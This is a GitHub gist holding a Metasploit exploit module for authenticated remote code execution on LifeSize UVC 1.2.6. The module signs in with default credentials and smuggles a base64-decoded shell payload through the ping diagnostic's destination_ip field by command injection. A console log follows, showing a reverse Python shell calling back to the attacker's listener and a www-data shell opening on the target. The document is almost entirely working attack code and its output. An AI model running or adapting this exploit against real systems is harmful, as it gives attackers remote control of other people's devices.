Last active
August 29, 2015 13:57
-
-
Save brandonprry/9692052 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpClient | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "LifeSize UVC 1.2.6 Authenticated RCE via Ping", | |
'Description' => %q{ | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
], | |
'References' => | |
[ | |
['URL', 'http://pastebin.com/FueRwWhe'] | |
], | |
'Platform' => ['unix', 'linux'], | |
'Arch' => ARCH_CMD, | |
'Targets' => | |
[ | |
['LifeSize UVC version <= 1.2.6', {}] | |
], | |
'Privileged' => false, | |
'Payload' => | |
{ | |
'DisableNops' => true, | |
'Compat' => | |
{ | |
'PayloadType' => 'cmd', | |
'RequiredCmd' => 'generic perl python telnet netcat' | |
} | |
}, | |
'DisclosureDate' => "Mar 21 2014", | |
'DefaultTarget' => 0)) | |
register_options( | |
[ | |
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']), | |
OptString.new('USERNAME', [true, 'The username to authenticate with', 'administrator']), | |
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin123']) | |
], self.class) | |
end | |
def exploit | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/accounts/login/') | |
}) | |
res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/ | |
token = $1 | |
post = { | |
'csrfmiddlewaretoken' => token, | |
'username' => datastore['USERNAME'], | |
'password' => datastore['PASSWORD'] | |
} | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/accounts/'), | |
'method' => 'POST', | |
'vars_post' => post, | |
'headers' => { | |
'Referer' => 'https://' + datastore['RHOST'] + '/accounts/' | |
}, | |
'cookie' => 'csrftoken=' + token | |
}) | |
cookie = res.get_cookies | |
new_cookie = 'csrftoken=' + token + '; ' + cookie | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'), | |
'cookie' => new_cookie | |
}) | |
res.body =~ /name='csrfmiddlewaretoken' value='(.*)'/ | |
token = $1 | |
new_cookie = 'csrftoken=' + token + '; ' + cookie | |
res = send_request_cgi({ | |
'uri' => normalize_uri(target_uri.path, '/server-admin/operations/diagnose/ping/'), | |
'method' => 'POST', | |
'headers' => { | |
'Referer' => 'https://' + datastore['RHOST'] + '/server-admin/operations/diagnose/ping/' | |
}, | |
'cookie' => new_cookie, | |
'data' => 'csrfmiddlewaretoken='+token+'&source_ip=' + datastore['RHOST'] + '&destination_ip=go`echo ' + Rex::Text.encode_base64(payload.encoded) + '|base64 --decode|sh`ogle.com' | |
}) | |
end | |
end | |
__END__ | |
msf exploit(lifesize_admin_ping) > show options | |
Module options (exploit/linux/http/lifesize_admin_ping): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
PASSWORD admin123 yes The password to authenticate with | |
Proxies no Use a proxy chain | |
RHOST 172.31.16.99 yes The target address | |
RPORT 443 yes The target port | |
TARGETURI / yes The URI of the vulnerable instance | |
USERNAME administrator yes The username to authenticate with | |
VHOST no HTTP server virtual host | |
Payload options (cmd/unix/reverse_python): | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
LHOST 172.31.16.166 yes The listen address | |
LPORT 4444 yes The listen port | |
SHELL /bin/bash yes The system shell to use. | |
Exploit target: | |
Id Name | |
-- ---- | |
0 LifeSize UVC version <= 1.2.6 | |
msf exploit(lifesize_admin_ping) > exploit | |
[*] Started reverse handler on 172.31.16.166:4444 | |
[*] Command shell session 3 opened (172.31.16.166:4444 -> 172.31.16.99:42603) at 2014-03-21 11:02:43 -0700 | |
bash: no job control in this shell | |
www-data@fdsa:~$ id | |
uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
www-data@fdsa:~$ exit | |
[*] 172.31.16.99 - Command shell session 3 closed. Reason: Died from EOFError | |
msf exploit(lifesize_admin_ping) > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment